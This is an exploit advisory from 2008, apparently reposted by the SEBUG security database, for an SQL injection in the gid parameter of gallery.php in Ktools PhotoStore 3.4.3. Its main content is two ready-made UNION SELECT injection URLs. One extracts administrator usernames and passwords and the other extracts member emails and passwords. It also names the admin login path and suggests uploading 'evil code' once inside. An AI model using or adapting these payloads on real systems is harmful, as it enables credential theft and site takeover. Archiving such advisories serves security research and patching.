Ktools PhotoStore 3.4.3 (gallery.php gid) SQL Injection Vulnerability

SBEUGID:SEBUGE2008053535
发布时间:2008-05-09
[www.sebug.net]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

#########################################
# Remote SQL Injection Vulnerability    #
#                                       #
#  PhotoStore 3.4.3 ( gallery.php gid ) #
#                                       #
#########################################
## Script NAME  : PhotoStore
## VERSION : 3.4.3
## DOWNLOAD : http://www.ktools.net/
#########################################
## AuTh0r : Mr.SQL
## H0ME   : WwW.PaL-HaCkEr.CoM
## Email   : SQL@Hotmail.it 
#########################################
## D0rk ::  n/a   ;)
################################################################################

## ExPlo!t For ADMIN INFO  :
===> http://www.exampel.com/gallery.php?gid=-9696'+UnIoN+SelecT+1,concat(username,0x3c7c7c204d722e53514c207c7c3e,password),3,4,5,6,7,8,9,10,1,12,13+from+mgr_users/*
 
#############
 
## Explo!T For Users INFO :
===> http://www.exampel.com/gallery.php?gid=-9696'+union+select+1,concat(email,'::Mr.SQL::',password),3,4,5,6,7,8,9,10,1,12,13+from+members/*

###################################################################################
 
===>> Admin P@nel
                    /manager/login.php

### N0TE ## YOU Can UploaD Your Ev!l Code  ADMIN CP
#############
<< Gr33Tz >>  
Dark MaSTer :: HaCkEr-EGy :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: SecuritY FearS :: (( MuslimS HaCkErS ))
#####################################################
                                                      
                                                                (( Geek InjEcT0r ))
// Sebug.net [ 2008-05-11 ]

本信息由SEBUG翻译整理,版权所有,未经许可,不得转载

提交信息 | 本站声明 | 帮助 | 论坛 | 合作伙伴
Copyright © SEBUG Security Database 2006  All rights Reserved.
鄂ICP备05024839号